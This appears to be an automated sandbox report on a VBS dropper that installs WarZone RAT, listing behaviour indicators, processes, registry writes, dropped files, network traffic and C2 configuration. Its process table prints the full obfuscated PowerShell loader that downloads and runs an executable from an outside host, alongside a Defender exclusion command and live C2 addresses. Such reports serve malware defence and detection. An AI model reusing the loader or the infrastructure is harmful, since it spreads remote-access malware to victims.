analyze malware
- Huge database of samples and IOCs
- Custom VM setup
- Unlimited submissions
- Interactive approach
| File name: | payload.vbs |
| Full analysis: | https://app.any.run/tasks/68c5297b-cad9-480a-9979-52ad78b3cbaa |
| Verdict: | Malicious activity |
| Threats: | WarZone RAT is a remote access trojan, which is written in C++ and offered as a malware-as-a-service. It packs a wide range of capabilities, from stealing victims’ files and passwords to capturing desktop activities. WarZone RAT is primarily distributed via phishing emails and receives regular updates from its C2. |
| Analysis date: | September 30, 2023, 18:10:47 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 64 bit) |
| Tags: | |
| Indicators: | |
| MIME: | text/plain |
| File info: | ASCII text, with very long lines |
| MD5: | EBD8D4466968F9459C1E6CE8D3089371 |
| SHA1: | 87CA4C6C2A9F60C3E732345F64A2193726FBBAC0 |
| SHA256: | 9EDCA23169D5993D4741088D4615576995EDCB96B6EC2614ADA0FEB8792E3D75 |
| SSDEEP: | 1536:WdxPs2Sg7fWmSVpYXclxFkonXBLbicyjTj45:72SSWj5VcjTj45 |
MALICIOUS
Application was dropped or rewritten from another process
- Cache.exe (PID: 3380)
- svchost.exe (PID: 1896)
Drops the executable file immediately after the start
- powershell.exe (PID: 3080)
- Cache.exe (PID: 3380)
Changes powershell execution policy (Unrestricted)
- wscript.exe (PID: 3296)
Connects to the CnC server
- mscorsvw.exe (PID: 2884)
WARZONE was detected
- mscorsvw.exe (PID: 2884)
Adds path to the Windows Defender exclusion list
- svchost.exe (PID: 1896)
AVEMARIA was detected
- mscorsvw.exe (PID: 2884)
WARZONE detected by memory dumps
- mscorsvw.exe (PID: 2884)
SUSPICIOUS
The Powershell connects to the Internet
- powershell.exe (PID: 3080)
Creates executable files that already exist in Windows
- Cache.exe (PID: 3380)
Unusual connection from system programs
- powershell.exe (PID: 3080)
Starts CMD.EXE for commands execution
- Cache.exe (PID: 3380)
Reads the Internet Settings
- wscript.exe (PID: 3296)
- powershell.exe (PID: 3080)
- svchost.exe (PID: 1896)
Adds/modifies Windows certificates
- wscript.exe (PID: 3296)
Executing commands from a ".bat" file
- Cache.exe (PID: 3380)
Starts POWERSHELL.EXE for commands execution
- wscript.exe (PID: 3296)
- svchost.exe (PID: 1896)
Probably download files using WebClient
- wscript.exe (PID: 3296)
Powershell scripting: start process
- wscript.exe (PID: 3296)
The process creates files with name similar to system file names
- Cache.exe (PID: 3380)
Uses TIMEOUT.EXE to delay execution
- cmd.exe (PID: 2680)
Script adds exclusion path to Windows Defender
- svchost.exe (PID: 1896)
Connects to unusual port
- mscorsvw.exe (PID: 2884)
INFO
Reads the machine GUID from the registry
- Cache.exe (PID: 3380)
- svchost.exe (PID: 1896)
- mscorsvw.exe (PID: 2884)
Reads the computer name
- Cache.exe (PID: 3380)
- svchost.exe (PID: 1896)
- mscorsvw.exe (PID: 2884)
Checks supported languages
- Cache.exe (PID: 3380)
- svchost.exe (PID: 1896)
- mscorsvw.exe (PID: 2884)
Create files in a temporary directory
- Cache.exe (PID: 3380)
The executable file from the user directory is run by the Powershell process
- Cache.exe (PID: 3380)
Creates files or folders in the user directory
- Cache.exe (PID: 3380)
- mscorsvw.exe (PID: 2884)
The executable file from the user directory is run by the CMD process
- svchost.exe (PID: 1896)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
WarZone
(PID) Process(2884) mscorsvw.exe
C2 (2)Superherocan.mywire.org:5200
SuperGuy.camdvr.org:6000
BuildID2ATGDKGAR24
Options
Install FlagFalse
Startup FlagFalse
Reverse Proxy local port5000
Offline logTrue
PersistanceFalse
UAC bypassFalse
Defender bypassFalse
Use ADSFalse
Total processes
44
Monitored processes
9
Malicious processes
6
Suspicious processes
0
Behavior graph
Click at the process to see the details
Process information
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 3296 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\payload.vbs" | C:\Windows\System32\wscript.exe | — | explorer.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 3080 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted function QCyOP($LfxxvIXuk, $nsNHppl){[IO.File]::WriteAllBytes($LfxxvIXuk, $nsNHppl)};function UTgnMckai($LfxxvIXuk){if($LfxxvIXuk.EndsWith((PzWDEgSp @(42681,42735,42743,42743))) -eq $True){Start-Process (PzWDEgSp @(42749,42752,42745,42735,42743,42743,42686,42685,42681,42736,42755,42736)) $LfxxvIXuk}else{Start-Process $LfxxvIXuk}};function oWcFuS($QAGuEuW){$GEWkFQ = New-Object (PzWDEgSp @(42713,42736,42751,42681,42722,42736,42733,42702,42743,42740,42736,42745,42751));[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::TLS12;$nsNHppl = $GEWkFQ.DownloadData($QAGuEuW);return $nsNHppl};function PzWDEgSp($DwsEszM){$xAvBHV=42635;$YxQnI=$Null;foreach($GJWJwE in $DwsEszM){$YxQnI+=[char]($GJWJwE-$xAvBHV)};return $YxQnI};function fMxFFYYf(){$fFIONeQho = $env:APPDATA + '\';$KpdLa = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42690,42688,42710,42730,42704,42712,42700,42708,42711,42730,42720,42718,42704,42717,42715,42700,42718,42718,42681,42749,42751,42737));$ZgzkEmW = $fFIONeQho + '75K_EMAIL_USERPASS.rtf';QCyOP $ZgzkEmW $KpdLa;UTgnMckai $ZgzkEmW;;$TobweY = oWcFuS (PzWDEgSp @(42739,42751,42751,42747,42750,42693,42682,42682,42754,42754,42754,42681,42737,42749,42736,42736,42734,42749,42756,42747,42751,42746,42749,42746,42733,42746,42751,42681,42734,42746,42744,42682,42717,42736,42743,42736,42732,42750,42736,42682,42702,42732,42734,42739,42736,42681,42736,42755,42736));$pXbEDyNl = $fFIONeQho + 'Cache.exe';QCyOP $pXbEDyNl $TobweY;UTgnMckai $pXbEDyNl;;;}fMxFFYYf; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 308 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\75K_EMAIL_USERPASS.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.5123.5000 Modules
| |||||||||||||||
| 3380 | "C:\Users\admin\AppData\Roaming\Cache.exe" | C:\Users\admin\AppData\Roaming\Cache.exe | — | powershell.exe | |||||||||||
User: admin Company: EVAwoHec Integrity Level: MEDIUM Description: ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo. Exit code: 0 Version: 7.50.939.23 Modules
| |||||||||||||||
| 2680 | C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.bat"" | C:\Windows\SysWOW64\cmd.exe | — | Cache.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 788 | timeout 3 | C:\Windows\SysWOW64\timeout.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1896 | "C:\Users\admin\AppData\Roaming\svchost.exe" | C:\Users\admin\AppData\Roaming\svchost.exe | — | cmd.exe | |||||||||||
User: admin Company: EVAwoHec Integrity Level: MEDIUM Description: ORaJI uuEx UmOIaKeFuYa EeIhI eQIcOgOTo. Exit code: 0 Version: 7.50.939.23 Modules
| |||||||||||||||
| 3176 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\admin\AppData\Roaming\svchost.exe" -Force | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | — | svchost.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
| 2884 | "C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe" | C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | svchost.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: .NET Runtime Optimization Service Version: 4.7.2558.0 built by: NET471REL1 Modules
WarZone(PID) Process(2884) mscorsvw.exe C2 (2)Superherocan.mywire.org:5200 SuperGuy.camdvr.org:6000 BuildID2ATGDKGAR24 Options Install FlagFalse Startup FlagFalse Reverse Proxy local port5000 Offline logTrue PersistanceFalse UAC bypassFalse Defender bypassFalse Use ADSFalse | |||||||||||||||
Total events
5 711
Read events
5 634
Write events
74
Delete events
3
Modification events
| (PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | ProxyBypass |
Value: 1 | |||
| (PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | IntranetName |
Value: 1 | |||
| (PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | UNCAsIntranet |
Value: 1 | |||
| (PID) Process: | (3296) wscript.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
| Operation: | write | Name: | AutoDetect |
Value: 0 | |||
| (PID) Process: | (3080) powershell.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\156\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (3080) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\C7C20953EB5AC83C81CA388170EEC982E577F810 |
| Operation: | write | Name: | Blob |
Value: 0200000001000000CC0000001C0000006C00000001000000000000000000000000000000010000007B00340030004100350046004200430032002D0038004600300046002D0034003700320044002D0039004200380041002D003700420032003500300034004300300045004200410038007D00000000004D006900630072006F0073006F0066007400200045006E00680061006E006300650064002000430072007900700074006F0067007200610070006800690063002000500072006F00760069006400650072002000760031002E003000000000001900000001000000100000000FED148DCA9288CFE9E8CFEDE332D41E0F00000001000000200000003940FA3A00F54D92B7F88E2D48C2772C8ABB2A13E49A0D26CD13424C4B551832030000000100000014000000C7C20953EB5AC83C81CA388170EEC982E577F810140000000100000014000000396A962A0D9CA2D65CF53FD9D5915A728280AB8020000000010000004C0300003082034830820230A0030201020209009BC2D79761F68C84300D06092A864886F70D01010B05003039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E79301E170D3230303932383036333030355A170D3330303932363036333030355A3039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100A20B189EC9265492B7621FFE83B82E05923AB02D2DEE3E20C24BB7D8923FA45D5D62E0925DAF5EABBDD7C870E4D1229FF08A2D78D685E81450475802410F692FBBD1DFA12CE5E60EE26583458D949D7C0EDC212A1DCADB4426B6F6C2BE40B90B95BED978CC99FCBE9C00035C8FEE07200B20EA4B86FD3E9FFE42AAD926D2D381CC4C95AF963C3A19A7C90BC1C084F7434A83B0626E41A8E4EB3AC624E5DBB3D3214D535FC45294D746609F6E69B44DA48305DE63BA6FEF283E2778254E8579ABB0295629954E228B18AB5355FEF0F664D9DCD2C4A5047D4879BE8587687E37DE690C4E0D45927B2384E1BF09BE1F2744B50D54D5CD0B1223F5D31A446401D1A90203010001A3533051301D0603551D0E04160414396A962A0D9CA2D65CF53FD9D5915A728280AB80301F0603551D23041830168014396A962A0D9CA2D65CF53FD9D5915A728280AB80300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010089391C5F3A6B3AA5CCD58C62CE4DC5E71A59F014066678C1ECB7959D4F5F5ACDF23E1EAD032ECC41C459B54A991C40E23F546C64C424BF954035D94C0F30EA7172E98E40F5D8A9B389A56360D837BDF5149754095403EE1AC7BE6415DEA18C10E98113868D6BD01C1FCA8A7704AAB167D9BA70D4FBCCC8E1836CC11AF03E8A62E13DB2EBF7038E469ED65D1D46B3074D92BB304F8FF41068DEC4BB499974635A8C524E4DA418B524529C641DBA82918A55FFBC82B8688B0838C3CEB24647B6142CDB17837E3978D7C551803638DE839DC9B2F9B368773E9148364ABEACF9ABB4A20A3D72122F22E3E17F0969B4C8C2CAF88C5B5D74EC82C19FA533D01ADD79A3 | |||
| (PID) Process: | (3080) powershell.exe | Key: | HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\C7C20953EB5AC83C81CA388170EEC982E577F810 |
| Operation: | write | Name: | Blob |
Value: 040000000100000010000000F7998935234BC4DE2CB672C84BD55034140000000100000014000000396A962A0D9CA2D65CF53FD9D5915A728280AB80030000000100000014000000C7C20953EB5AC83C81CA388170EEC982E577F8100F00000001000000200000003940FA3A00F54D92B7F88E2D48C2772C8ABB2A13E49A0D26CD13424C4B5518321900000001000000100000000FED148DCA9288CFE9E8CFEDE332D41E0200000001000000CC0000001C0000006C00000001000000000000000000000000000000010000007B00340030004100350046004200430032002D0038004600300046002D0034003700320044002D0039004200380041002D003700420032003500300034004300300045004200410038007D00000000004D006900630072006F0073006F0066007400200045006E00680061006E006300650064002000430072007900700074006F0067007200610070006800690063002000500072006F00760069006400650072002000760031002E0030000000000020000000010000004C0300003082034830820230A0030201020209009BC2D79761F68C84300D06092A864886F70D01010B05003039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E79301E170D3230303932383036333030355A170D3330303932363036333030355A3039310B30090603550406130241553113301106035504080C0A536F6D652D537461746531153013060355040A0C0C536F6D652D436F6D70616E7930820122300D06092A864886F70D01010105000382010F003082010A0282010100A20B189EC9265492B7621FFE83B82E05923AB02D2DEE3E20C24BB7D8923FA45D5D62E0925DAF5EABBDD7C870E4D1229FF08A2D78D685E81450475802410F692FBBD1DFA12CE5E60EE26583458D949D7C0EDC212A1DCADB4426B6F6C2BE40B90B95BED978CC99FCBE9C00035C8FEE07200B20EA4B86FD3E9FFE42AAD926D2D381CC4C95AF963C3A19A7C90BC1C084F7434A83B0626E41A8E4EB3AC624E5DBB3D3214D535FC45294D746609F6E69B44DA48305DE63BA6FEF283E2778254E8579ABB0295629954E228B18AB5355FEF0F664D9DCD2C4A5047D4879BE8587687E37DE690C4E0D45927B2384E1BF09BE1F2744B50D54D5CD0B1223F5D31A446401D1A90203010001A3533051301D0603551D0E04160414396A962A0D9CA2D65CF53FD9D5915A728280AB80301F0603551D23041830168014396A962A0D9CA2D65CF53FD9D5915A728280AB80300F0603551D130101FF040530030101FF300D06092A864886F70D01010B0500038201010089391C5F3A6B3AA5CCD58C62CE4DC5E71A59F014066678C1ECB7959D4F5F5ACDF23E1EAD032ECC41C459B54A991C40E23F546C64C424BF954035D94C0F30EA7172E98E40F5D8A9B389A56360D837BDF5149754095403EE1AC7BE6415DEA18C10E98113868D6BD01C1FCA8A7704AAB167D9BA70D4FBCCC8E1836CC11AF03E8A62E13DB2EBF7038E469ED65D1D46B3074D92BB304F8FF41068DEC4BB499974635A8C524E4DA418B524529C641DBA82918A55FFBC82B8688B0838C3CEB24647B6142CDB17837E3978D7C551803638DE839DC9B2F9B368773E9148364ABEACF9ABB4A20A3D72122F22E3E17F0969B4C8C2CAF88C5B5D74EC82C19FA533D01ADD79A3 | |||
| (PID) Process: | (308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1033 |
Value: On | |||
| (PID) Process: | (308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1041 |
Value: On | |||
| (PID) Process: | (308) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
| Operation: | write | Name: | 1042 |
Value: On | |||
Executable files
2
Suspicious files
7
Text files
2
Unknown types
0
Dropped files
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR3BE0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
| 308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0000.doc | — | |
MD5:— | SHA256:— | |||
| 308 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRD0001.doc | — | |
MD5:— | SHA256:— | |||
| 2884 | mscorsvw.exe | C:\Users\admin\AppData\Local\Microsoft Vision\2023-09-30_18.11.27 | binary | |
MD5:6CD873EA972F2E373D32FD30BEF9C1BB | SHA256:473D1326B7A1668494CC38DB348929DF02159A32FBAEE2F2ACB7CB857985A195 | |||
| 3380 | Cache.exe | C:\Users\admin\AppData\Local\Temp\tmp70BC.tmp.bat | text | |
MD5:D76DE334DADD5F50AC32212D9C9E2EE0 | SHA256:84D3177F8CD041A09EACE21034542AE0D60F33EEEA9CC1CF9B682CD1D7B9C172 | |||
| 3380 | Cache.exe | C:\Users\admin\AppData\Roaming\svchost.exe | executable | |
MD5:19FACA8998FC47A4ED790B4C8CBC4E6B | SHA256:86C94E5F96B047700F26F29D0F0ECF7BC76C78883C859E4D26FE4F3E3E00E7AD | |||
| 308 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\~$K_EMAIL_USERPASS.rtf | binary | |
MD5:4C7E3C90A531F4B4A74D4176A17AA427 | SHA256:F58F357A5709038DD3B973F99C03E462BEE7253095AC223856335E1DF540F14E | |||
| 3080 | powershell.exe | C:\Users\admin\AppData\Roaming\75K_EMAIL_USERPASS.rtf | text | |
MD5:EDAE6BE553EA0DF5905B398047BCDDB8 | SHA256:4D3612EA1EF31B5D213D0F199A7FC661DA70AC24E78A6180ACBB0E49C66257F2 | |||
| 3080 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | binary | |
MD5:446DD1CF97EABA21CF14D03AEBC79F27 | SHA256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF | |||
| 3176 | powershell.exe | C:\Users\admin\AppData\Local\Temp\vsdf02ho.5r3.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
6
DNS requests
3
Threats
0
HTTP requests
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
— | — | GET | 200 | www.freecryptorobot.com:443 | https://www.freecryptorobot.com/Release/Cache.exe | unknown | executable | 1015 Kb | — |
— | — | GET | 200 | www.freecryptorobot.com:443 | https://www.freecryptorobot.com/Release/75K_EMAIL_USERPASS.rtf | unknown | text | 2.20 Mb | — |
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
Connections
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1208 | svchost.exe | 239.255.255.250:1900 | — | — | — | whitelisted |
332 | svchost.exe | 224.0.0.252:5355 | — | — | — | unknown |
3080 | powershell.exe | 194.87.14.76:443 | www.freecryptorobot.com | HostSlick | CZ | unknown |
2884 | mscorsvw.exe | 185.225.74.106:5200 | Superherocan.mywire.org | AS-DC | US | unknown |
DNS requests
Domain | IP | Reputation |
|---|---|---|
www.freecryptorobot.com |
| unknown |
Superherocan.mywire.org |
| unknown |
Threats
PID | Process | Class | Message |
|---|---|---|---|
332 | svchost.exe | Potentially Bad Traffic | ET INFO DYNAMIC_DNS Query to a *.mywire .org Domain |
2884 | mscorsvw.exe | A Network Trojan was detected | ET MALWARE Warzone RAT Response (Inbound) |
17 ETPRO signatures available at the full report